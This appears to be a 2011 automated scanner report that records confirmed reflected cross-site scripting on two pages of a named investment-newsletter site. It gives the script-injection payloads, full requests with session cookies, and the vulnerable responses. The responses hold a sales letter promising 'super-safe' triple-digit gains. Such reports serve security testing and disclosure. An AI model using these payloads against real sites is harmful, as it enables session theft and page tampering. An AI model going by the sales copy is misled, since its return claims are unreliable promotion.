P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 66467
Content-Type: text/html
Cache-control: private




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>S&amp;A's Private Wealth Alliance</title>
</head>

<body>
<table width="600" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><p align="center"><font size="7" face="Impact">Why We're Giving You One of S&amp;A's $1,000 Premium Research Services, <br>
Free for a Year</font></p>
<p align="center"><font size="5" face="Impact">Starting today, you'll have the opportunity to make 1,295%. . .&nbsp; 560%. . . or 239%. . . without paying one dime extra</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Dear S&amp;A Subscriber,</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">We're doing something at S&amp;A that we have never done before.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">You can choose one of our three best $1,000 premium research services...</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">And receive it <u>at no additional charge</u>, for one full year.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">These three premium S&amp;A advisory letters are the most exclusive&mdash;and important&mdash;investment research work we do at S&amp;A.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">...And for the next 10 days, you can choose to receive <em>Sjuggerud Confidential</em>, or <em>Extreme Value</em>, or <em>S&amp;A Prospector</em>, free for one year.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Which will you choose?</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Well, if you're the type who likes to speculate for potential triple-digit gains, with as little risk as possible, then you'll probably want to choose <strong><em>Sjuggerud Confidential</em></strong>...</font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">&gt;&gt;&gt; Dr. Steve Sjuggerud's private research service on &quot;alternative&quot; investments will introduce you to super-safe ideas you'll never hear on CNBC. Like Chinese timber, emerging market stocks, rare gold coins, tiny mining companies, and more. These are the kind of investment ideas professional money men keep to themselves... that's why <em>Sjuggerud Confidential</em> members have had the chance to make <strong>gains of 1,295%, 270%, 145%, and 106%...</strong></font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong>Or...</strong> if you're a fan of &quot;value&quot; investing... the kind of person who appreciates an undervalued bargain stock, you'll want to choose <strong><em>Extreme Value</em></strong>&mdash;which has the best track record of anything we publish at S&amp;A...</font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">&gt;&gt;&gt; In <em>Extreme Value</em>, editor Dan Ferris spends ten mind-numbing hours a day reading and analyzing balance sheets, 10ks and Form-4s... the kind of painstaking research that most analysts simply won't do. That's why Dan has the best track record of any of our analysts&mdash;an average return of 48%. His readers could have made <strong>560%, 511%, </strong>and<strong> 271% returns,</strong> among many other super-safe double and triple-digit winners...</font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong>Or...</strong> if you're looking for unlimited upside ways to take advantage of the commodities bull market, you'll want to choose a free one-year subscription to <strong><em>S&amp;A Prospector</em></strong><em>...</em></font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">&gt;&gt;&gt; The research editor Matt Badiali does in <strong><em>S&amp;A Prospector</em></strong> simply can't be done by staring at a computer screen all day. A field geologist for 15 years before joining S&amp;A, Matt investigates the best opportunities in natural resources, mining, precious metals, and energy. In just the past several months, Matt's spent significant time investigating opportunities in Canada, Utah, Texas, California, Nevada, and Minnesota... and his readers have had the chance to make <strong>gains of 239%, 119%, and 93%</strong>... among others...</font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Each of these three investment advisories costs $1,000 &ndash; just for a one-year subscription... much more than what most folks ever pay for financial research...</font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong>So we're offering you the opportunity to receive any one of the three&mdash;either <em>Sjuggerud Confidential</em>, or <em>Extreme Value</em>, or <em>S&amp;A Prospector&mdash;</em>for one full year, our compliments.</strong></font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Just let us know within the next 57 days, before this offer expires. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In exchange, we're asking you to try something too... </font></p>
<h3 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif">Why We're Making You this Offer...</font></h3>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Here's why we're doing this... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> We have recently decided to re-open what we believe is the most beneficial membership in the entire investment publishing business. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> We call this group the <em>S&amp;A Private Wealth Alliance</em>. In short, the Private Wealth Alliance gives you our 7 most comprehensive research services&mdash;for life... for a ridiculously low price. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">And to sweeten the deal even more, we want to GIVE you a free full year of one of our best $1,000 trading research services.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> But I'm getting ahead of myself. Let me first explain how the <em>Private Wealth Alliance</em> works, how it can benefit you, and what it includes, so you can decide if it's something that might interest you... </font></p>
<h2 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif"><strong> What is the <em>Private Wealth Alliance</em>? </strong></font></h2>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> It's a collection of S&amp;A's 7 most comprehensive research services that provide the biggest, safest, and most consistent gains. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Why are we bundling our top 7 research services into one convenient package? <br>
</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Because we believe this is the perfect combination of research for the long-term (you'll see why in a minute). And it gives you a way to receive all of this research for as long as you like&mdash;for a low one-time fee. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> As a <em>Private Wealth Alliance</em> Member, you'll be entitled to a lifetime subscription to the research of S&amp;A analysts Dr. Steve Sjuggerud, Jeff Clark, Porter Stansberry, Tom Dyson, Matt Badiali, Rob Fannon, and Graham Summers. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> There are no speculative strategies, options plays, or day-trading strategies included in the <em>Private Wealth Alliance</em>. Instead, these are the kinds of ideas, we believe, the average investor should be following with the bulk (about 90%) of any investment portfolio. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In other words, we've put our best safe and long-term research together in one package. These collective investment ideas are the absolute best way to grow your money safely. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Until New Year's Eve, you can pay one low price, and get all of these services every single year, for one ridiculously low fee, and an even smaller annual maintenance fee, for as long as we are publishing them. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong> And for the first time ever</strong>, you also get your choice of <em>Sjuggerud Confidential...Extreme Value...</em> or <em>S&amp;A Prospector</em>, with our compliments, for one full year. </font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> * In a moment, I'll also tell you about another new service we've added that only <em>Private Wealth Alliance</em> Members will receive... our best &quot;private&quot; investment ideas, four times per year... </font></p>
</blockquote> <p><font size="3" face="Georgia, Times New Roman, Times, serif"> But before I get to that, let me tell you about the core group of research services the <em>Private Wealth Alliance</em> includes... and how you'll learn... </font></p>
<h1 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif"><strong> 1. The Only Strategy I Know That Could Pay You as Much as $11,500, Overnight </strong></font></h1>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In the San Francisco Bay Area, we recently discovered the solution to every retiree's dream of having an unending stream of income... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> I'm talking about a way for you as an investor to collect a payout of as much as $11,500 or more&mdash;in cash&mdash;in 24 hours. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> We call it &quot;California Overnight Dividends.&quot; It's not a loan. And it's not an advance against future earnings. Instead, it's a stock market alternative that's making some Americans rich (as you'll see in a moment)... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> And the best part is, this is not a one-time thing. You can continue collecting these payments as often as every single month... 12 times per year... for as long as you chose. You can use it to invest, to pay bills... to go on vacation... whatever you want. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> If making extraordinary amounts of income from your investment portfolio is something you are interested in doing, then you'll want to learn more about &quot;California Overnight Dividends&quot;&mdash;an income secret detailed by Jeff Clark in our new advisory letter called <em>Advanced Income</em>. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> For roughly the past 25 years, Jeff had been acting as a private money manager for some of California's wealthiest individuals. Jeff specializes in several unique investment strategies that enabled him to help his clients earn extraordinary amounts of income from their holdings. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> For example, we met one of Jeff's former clients, a man named David Benson. Jeff showed David how his 2,000 shares of Siebel were eligible for &quot;Overnight Dividends.&quot; <strong>In the course of approximately one year, Jeff helped him make almost a half-million dollars, with &quot;Overnight Dividends&quot; alone.</strong></font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> As Benson told us: </font></p>
<p> <font size="3" face="Courier New, Courier, mono">&quot;This is the most profitable thing I've ever done. It's amazing. <u>Because of this I bought a vacation ski home in Tahoe</u>. My kids got to learn how to ski when they were just three years old! And I now get to spend many weekends every year there with my family. It's a dream come true... and I <em> <u>never, ever</u></em> would have been able to do it without Jeff Clark.&quot; </font></p>
</blockquote> <p><font size="3" face="Georgia, Times New Roman, Times, serif"> In <em>Advanced Income</em>, Jeff will not be writing about the next hot stock trend. He won't be writing about new technologies. And he won't be writing about value stocks or stocks and bonds that pay ordinary dividends... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Instead, Jeff will be covering two unique and proprietary income strategies&mdash;&quot;California Overnight Dividends&quot; and &quot;Double Dividends&quot;&mdash;that could safely make you a fortune, every single month. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> You'll have full access to Jeff Clark's <em>Advanced Income</em> research for as long as you want. </font></p>
<h1 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif"><strong> 2. The Real Secret to Making 5-10 <br>
Times Your Money</strong></font></h1>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Since 1973, how many times do you think the U.S. stock market was the best performing in the world? </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Three times? Ten times? </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> The answer: Zero. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Over the last 25 years, if you had simply looked abroad with just a tiny percentage of your portfolio, you could have made safe gains of 5-10-times as much as in the U.S. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> That's why we started our most exciting new research service, called <em>International Strategist.</em></font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Headed up by editor and lead researcher Graham Summers, our goal with this new service is to show you that there's always a great investment opportunity available&mdash;if you are simply willing to look beyond U.S. borders. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> As you would expect from a service like this one, Graham spends most of his time outside the U.S. He examines firsthand the different ways people in other countries are planning for retirement&mdash;and investigates the best global investments for U.S. retirees, and people looking to retire, each month in <em>International Strategist</em>. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In the past year, Graham has spent considerable fact-finding time in Zurich, Switzerland, Dubai, Paris, Singapore, and the United Kingdom... </font></p>
<p><font size="3" face=&..
- /pro/special/0712PWAORISP.asp

/pro/special/0712PWAORISP.asp CONFIRMED

http://www.stansberryresearch.com/pro/special/0712PWAORISP.asp?list=digest&lead=%22%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
list GET digest
lead GET "><script>alert(9)</script>

Request

GET /pro/special/0712PWAORISP.asp?list=digest&lead=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/holiday/20071227SP.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=EPAOLMLBCOHOBGBDMJMPKAHB; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=COGBMFABHDLLNIJEPPPOMDNE; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:51:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 66477
Content-Type: text/html
Cache-control: private




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>S&amp;A's Private Wealth Alliance</title>
</head>

<body>
<table width="600" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><p align="center"><font size="7" face="Impact">Why We're Giving You One of S&amp;A's $1,000 Premium Research Services, <br>
Free for a Year</font></p>
<p align="center"><font size="5" face="Impact">Starting today, you'll have the opportunity to make 1,295%. . .&nbsp; 560%. . . or 239%. . . without paying one dime extra</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Dear S&amp;A Subscriber,</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">We're doing something at S&amp;A that we have never done before.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">You can choose one of our three best $1,000 premium research services...</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">And receive it <u>at no additional charge</u>, for one full year.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">These three premium S&amp;A advisory letters are the most exclusive&mdash;and important&mdash;investment research work we do at S&amp;A.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">...And for the next 10 days, you can choose to receive <em>Sjuggerud Confidential</em>, or <em>Extreme Value</em>, or <em>S&amp;A Prospector</em>, free for one year.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Which will you choose?</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Well, if you're the type who likes to speculate for potential triple-digit gains, with as little risk as possible, then you'll probably want to choose <strong><em>Sjuggerud Confidential</em></strong>...</font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">&gt;&gt;&gt; Dr. Steve Sjuggerud's private research service on &quot;alternative&quot; investments will introduce you to super-safe ideas you'll never hear on CNBC. Like Chinese timber, emerging market stocks, rare gold coins, tiny mining companies, and more. These are the kind of investment ideas professional money men keep to themselves... that's why <em>Sjuggerud Confidential</em> members have had the chance to make <strong>gains of 1,295%, 270%, 145%, and 106%...</strong></font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong>Or...</strong> if you're a fan of &quot;value&quot; investing... the kind of person who appreciates an undervalued bargain stock, you'll want to choose <strong><em>Extreme Value</em></strong>&mdash;which has the best track record of anything we publish at S&amp;A...</font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">&gt;&gt;&gt; In <em>Extreme Value</em>, editor Dan Ferris spends ten mind-numbing hours a day reading and analyzing balance sheets, 10ks and Form-4s... the kind of painstaking research that most analysts simply won't do. That's why Dan has the best track record of any of our analysts&mdash;an average return of 48%. His readers could have made <strong>560%, 511%, </strong>and<strong> 271% returns,</strong> among many other super-safe double and triple-digit winners...</font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong>Or...</strong> if you're looking for unlimited upside ways to take advantage of the commodities bull market, you'll want to choose a free one-year subscription to <strong><em>S&amp;A Prospector</em></strong><em>...</em></font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">&gt;&gt;&gt; The research editor Matt Badiali does in <strong><em>S&amp;A Prospector</em></strong> simply can't be done by staring at a computer screen all day. A field geologist for 15 years before joining S&amp;A, Matt investigates the best opportunities in natural resources, mining, precious metals, and energy. In just the past several months, Matt's spent significant time investigating opportunities in Canada, Utah, Texas, California, Nevada, and Minnesota... and his readers have had the chance to make <strong>gains of 239%, 119%, and 93%</strong>... among others...</font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">Each of these three investment advisories costs $1,000 &ndash; just for a one-year subscription... much more than what most folks ever pay for financial research...</font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong>So we're offering you the opportunity to receive any one of the three&mdash;either <em>Sjuggerud Confidential</em>, or <em>Extreme Value</em>, or <em>S&amp;A Prospector&mdash;</em>for one full year, our compliments.</strong></font></p>
</blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Just let us know within the next 57 days, before this offer expires. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In exchange, we're asking you to try something too... </font></p>
<h3 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif">Why We're Making You this Offer...</font></h3>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Here's why we're doing this... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> We have recently decided to re-open what we believe is the most beneficial membership in the entire investment publishing business. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> We call this group the <em>S&amp;A Private Wealth Alliance</em>. In short, the Private Wealth Alliance gives you our 7 most comprehensive research services&mdash;for life... for a ridiculously low price. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif">And to sweeten the deal even more, we want to GIVE you a free full year of one of our best $1,000 trading research services.</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> But I'm getting ahead of myself. Let me first explain how the <em>Private Wealth Alliance</em> works, how it can benefit you, and what it includes, so you can decide if it's something that might interest you... </font></p>
<h2 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif"><strong> What is the <em>Private Wealth Alliance</em>? </strong></font></h2>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> It's a collection of S&amp;A's 7 most comprehensive research services that provide the biggest, safest, and most consistent gains. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Why are we bundling our top 7 research services into one convenient package? <br>
</font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Because we believe this is the perfect combination of research for the long-term (you'll see why in a minute). And it gives you a way to receive all of this research for as long as you like&mdash;for a low one-time fee. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> As a <em>Private Wealth Alliance</em> Member, you'll be entitled to a lifetime subscription to the research of S&amp;A analysts Dr. Steve Sjuggerud, Jeff Clark, Porter Stansberry, Tom Dyson, Matt Badiali, Rob Fannon, and Graham Summers. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> There are no speculative strategies, options plays, or day-trading strategies included in the <em>Private Wealth Alliance</em>. Instead, these are the kinds of ideas, we believe, the average investor should be following with the bulk (about 90%) of any investment portfolio. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In other words, we've put our best safe and long-term research together in one package. These collective investment ideas are the absolute best way to grow your money safely. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Until New Year's Eve, you can pay one low price, and get all of these services every single year, for one ridiculously low fee, and an even smaller annual maintenance fee, for as long as we are publishing them. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"><strong> And for the first time ever</strong>, you also get your choice of <em>Sjuggerud Confidential...Extreme Value...</em> or <em>S&amp;A Prospector</em>, with our compliments, for one full year. </font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> * In a moment, I'll also tell you about another new service we've added that only <em>Private Wealth Alliance</em> Members will receive... our best &quot;private&quot; investment ideas, four times per year... </font></p>
</blockquote> <p><font size="3" face="Georgia, Times New Roman, Times, serif"> But before I get to that, let me tell you about the core group of research services the <em>Private Wealth Alliance</em> includes... and how you'll learn... </font></p>
<h1 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif"><strong> 1. The Only Strategy I Know That Could Pay You as Much as $11,500, Overnight </strong></font></h1>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In the San Francisco Bay Area, we recently discovered the solution to every retiree's dream of having an unending stream of income... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> I'm talking about a way for you as an investor to collect a payout of as much as $11,500 or more&mdash;in cash&mdash;in 24 hours. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> We call it &quot;California Overnight Dividends.&quot; It's not a loan. And it's not an advance against future earnings. Instead, it's a stock market alternative that's making some Americans rich (as you'll see in a moment)... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> And the best part is, this is not a one-time thing. You can continue collecting these payments as often as every single month... 12 times per year... for as long as you chose. You can use it to invest, to pay bills... to go on vacation... whatever you want. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> If making extraordinary amounts of income from your investment portfolio is something you are interested in doing, then you'll want to learn more about &quot;California Overnight Dividends&quot;&mdash;an income secret detailed by Jeff Clark in our new advisory letter called <em>Advanced Income</em>. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> For roughly the past 25 years, Jeff had been acting as a private money manager for some of California's wealthiest individuals. Jeff specializes in several unique investment strategies that enabled him to help his clients earn extraordinary amounts of income from their holdings. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> For example, we met one of Jeff's former clients, a man named David Benson. Jeff showed David how his 2,000 shares of Siebel were eligible for &quot;Overnight Dividends.&quot; <strong>In the course of approximately one year, Jeff helped him make almost a half-million dollars, with &quot;Overnight Dividends&quot; alone.</strong></font></p>
<blockquote>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> As Benson told us: </font></p>
<p> <font size="3" face="Courier New, Courier, mono">&quot;This is the most profitable thing I've ever done. It's amazing. <u>Because of this I bought a vacation ski home in Tahoe</u>. My kids got to learn how to ski when they were just three years old! And I now get to spend many weekends every year there with my family. It's a dream come true... and I <em> <u>never, ever</u></em> would have been able to do it without Jeff Clark.&quot; </font></p>
</blockquote> <p><font size="3" face="Georgia, Times New Roman, Times, serif"> In <em>Advanced Income</em>, Jeff will not be writing about the next hot stock trend. He won't be writing about new technologies. And he won't be writing about value stocks or stocks and bonds that pay ordinary dividends... </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Instead, Jeff will be covering two unique and proprietary income strategies&mdash;&quot;California Overnight Dividends&quot; and &quot;Double Dividends&quot;&mdash;that could safely make you a fortune, every single month. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> You'll have full access to Jeff Clark's <em>Advanced Income</em> research for as long as you want. </font></p>
<h1 align="center"><font size="5" face="Georgia, Times New Roman, Times, serif"><strong> 2. The Real Secret to Making 5-10 <br>
Times Your Money</strong></font></h1>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Since 1973, how many times do you think the U.S. stock market was the best performing in the world? </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Three times? Ten times? </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> The answer: Zero. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Over the last 25 years, if you had simply looked abroad with just a tiny percentage of your portfolio, you could have made safe gains of 5-10-times as much as in the U.S. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> That's why we started our most exciting new research service, called <em>International Strategist.</em></font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> Headed up by editor and lead researcher Graham Summers, our goal with this new service is to show you that there's always a great investment opportunity available&mdash;if you are simply willing to look beyond U.S. borders. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> As you would expect from a service like this one, Graham spends most of his time outside the U.S. He examines firsthand the different ways people in other countries are planning for retirement&mdash;and investigates the best global investments for U.S. retirees, and people looking to retire, each month in <em>International Strategist</em>. </font></p>
<p><font size="3" face="Georgia, Times New Roman, Times, serif"> In the past year, Graham has spent considerable fact-finding time in Zurich, Switzerland, Dubai, Paris, Singapore, and the United Kingdom... </font></p>
<p><font size="3" face=&..
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

http://www.stansberryresearch.com/forms/palConference.asp?error=email

Parameters

Parameter Type Value
error GET email
address2 POST '"--></style></script><script>alert(0x0056CD)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20132
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="''"--></style></script><script>netsparker(0x0056CD)</script>">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
